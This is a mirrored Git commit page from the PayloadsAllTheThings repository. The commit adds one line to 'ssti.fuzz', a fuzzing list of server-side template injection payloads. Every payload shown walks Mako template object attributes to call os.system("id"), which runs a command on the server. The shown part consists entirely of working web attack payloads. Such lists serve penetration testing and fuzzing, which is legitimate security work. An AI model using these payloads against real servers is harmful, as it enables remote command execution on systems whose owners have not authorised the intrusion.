mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 08:54:40 +01:00
Update ssti.fuzz
This commit is contained in:
parent
7582f0c527
commit
4b27af5a3d
1 changed files with 1 additions and 0 deletions
|
|
@ -61,3 +61,4 @@ ${self.module.runtime.util.compat.inspect.os.system("id")}
|
|||
${self.template._mmarker.module.cache.util.os.system("id")}
|
||||
${self.template.module.cache.compat.inspect.os.system("id")}
|
||||
${self.module.cache.compat.inspect.linecache.os.system("id")}
|
||||
${self.template._mmarker.module.runtime.util.os.system("id")}
|
||||
|
|
|
|||
Loading…
Reference in a new issue